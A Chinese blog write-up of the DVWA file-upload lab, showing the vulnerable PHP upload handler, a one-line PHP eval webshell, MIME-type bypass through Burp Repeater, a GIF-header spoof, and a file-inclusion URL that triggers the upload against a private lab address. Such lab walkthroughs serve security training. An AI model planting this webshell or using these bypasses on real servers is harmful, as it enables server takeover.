File Upload

过期的秋刀鱼-2023-08-17 21:01

File Upload

文件上传功能是大部分WEB应用的常用功能,网站允许用户自行上传头像、照片、一些服务类网站需要用户上传证明材料的电子档、电商类网站允许用户上传图片展示商品情况等。然而,看似不起眼的文件上传功能如果没有做好安全防护措施,就存在巨大的安全风险。

当用户在在文件上传的功能模块处上传文件时,如果WEB应用在文件上传过程中没有对文件的安全性进行有效的校验,攻击者可以通过上传WEBshell等恶意文件对服务器进行攻击,这种情况下认为系统存在文件上传漏洞,根据上传后文件存放位置不同,上传后对文件操作不用,可能会导致不一样的结构,包括完全控制系统,覆盖服务器文件等等。

文件上传漏洞与SQL注入或XSS相比,其风险更大。文件上传漏洞的利用分两步,第一需要能上传恶意文件,第二,恶意文件需要被触发,通过服务端自动运行触发或者攻击者配合其他漏洞手动触发。

LOW级别

php 复制代码 
<?php

if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 表示上传文件路径

$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 表示 文件名= 上传文件的路径+文件名

函数解释:

basename()函数

$_FILES函数

写一个一句话木马

php 复制代码 
<?php   @eval($_POST['hello']);  ?>

上传成功,给出了上传文件路径,

使用蚁剑连接一句话木马

复制代码 
http://192.168.80.145/dvwa/hackable/uploads/1.php

蚁剑连接成功

Medium级别

直接上传1.php,提示上传失败,只能上传文件类型为JPEG和PNG格式的文件

查看源码发现增加了校验

修改1.php后缀为png格式,

打开bp进行抓包查看

发送到Repeater,将后缀再改回php后缀 ,点send,从response中可以看到文件上传成功,并返回了保存路径。

蚁剑连接一句话木马

复制代码 
http://192.168.80.145/dvwa/hackable/uploads/1.php


High级别

substr () 函数: 点这里
strrpos () 函数: 点这里
strtolower () 函数: 点这里
getimagesize 函数: 点这里

后缀限制只能上传图片,大小10000B,strtolower()函数将无论是大写或小写的后缀名全改为小写,以防大小写绕过,并且getimagesize() 函数用于获取图像大小及相关信息,所以这里再用之前的php文件后缀名改为jpg或png就不可行了,不过也可以利用这个函数的漏洞进行绕过,既然对文件的开头内容进行了检测并且通过二进制识别是否为图像,那么就可以利用文件头欺骗,来让getimagesize()函数检测无效。

这里用GIF的文件头,在一句话木马前加上GIF的文件头标识,后缀改为png格式

php 复制代码 
GIF89a
<?php phpinfo(); ?> <? phpinfo();?>

上传成功

利用文件包含漏洞

php 复制代码 
http://192.168.80.145/dvwa/vulnerabilities/fi/?page=file://C:\phpstudy_pro\WWW\dvwa\hackable\uploads\demo.png
相关推荐
Le_ee4 天前
dvwa7——SQL Injection
数据库·sql·网络安全·靶场·token·dvwa
Le_ee4 天前
dvwa5——File Upload
网络安全·靶场·php·靶机·dvwa
Le_ee4 天前
dvwa4——File Inclusion
网络安全·靶场·dvwa
Le_ee5 天前
dvwa6——Insecure CAPTCHA
android·安全·网络安全·靶场·dvwa
旺旺仙贝1 个月前
SQL手工注入(DVWA)
dvwa
编程小白呀2 个月前
【DVWA 靶场通关】 File Inclusion(文件包含漏洞)
靶场·dvwa
编程小白呀3 个月前
【XSS】DVWA靶场XSS攻击
靶场·xss·dvwa
H轨迹H3 个月前
Vulnhub-DC-9靶机-SQL注入拿到账户+利用端口敲门连接ssh+信息泄露利用root脚本追加提权
网络安全·渗透测试·vulnhub·ctf·靶机·oscp
H轨迹H3 个月前
VulnHub-DC-6靶机-wpscan爆破+命令注入反弹shell+nmap提权
linux·网络安全·渗透测试·vulnhub·靶机
H轨迹H4 个月前
Vulnhun靶机-kioptix level 4-sql注入万能密码拿到权限ssh连接利用mysql-udf漏洞提权
网络安全·渗透测试·vulnhub·靶机·web漏洞·oscp
热门推荐
01【图像处理与机器视觉】XJTU期末考点02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03KGG转MP3工具|非KGM文件|解密音频04海康Visionmaster-常见问题排查方法-启动阶段05YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07Coze扣子平台完整体验和实践(附国内和国际版对比)08DeepSeek各版本说明与优缺点分析09VMware虚拟机安装Win7专业版保姆级教程(附镜像包)10ICASSP2025 SPGC Challenge认知衰退挑战赛——通过自发语音的认知能力下降预测与识别(PROCESS)信号处理大奖赛